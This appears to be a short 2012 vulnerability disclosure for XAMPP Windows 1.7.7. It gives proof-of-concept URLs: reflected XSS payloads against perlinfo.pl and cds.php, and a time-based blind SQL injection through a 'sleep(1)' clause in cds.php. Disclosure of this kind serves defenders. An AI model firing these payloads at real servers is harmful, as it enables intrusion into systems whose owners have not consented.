$------------------------------------------------------------------------------------------------------------ $ XAMPP Windows 1.7.7 multiple XSS/Blind SQL Injection Vulnerabilities $ Author : Sangteamtham $ Home : Hcegroup.net $ Download :http://www.apachefriends.org/en/xampp-windows.html $ Date :06/07/2012 $ Twitter: http://twitter.com/Sangte_amtham $****************************************************************************************** 1.Description: XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use - just download, extract and start. 2. POC: XSS Vulnerabilities: http://localhost/xampp/perlinfo.pl/"<script>alert("XSS")</script> http://localhost/xampp/cds.php/%27onmouseover=alert%28%22XSS%22%29%3E --> still not fixed from version 1.7.4 Blind SQL Injection: http://localhost/xampp/cds.php?interpret=1&jahr=1967 and sleep(1) &titel=555-666-0606 $****************************************************************************************** $ Greetz to: All Vietnamese hackers and Hackers out there researching for more security $ $ $---------------------------------------------------------------------------------------------------------------Брой прочитания на тази страница: 1188
XAMPP Windows 1.7.7 multiple XSS/Blind SQL Injection Vulnerabilities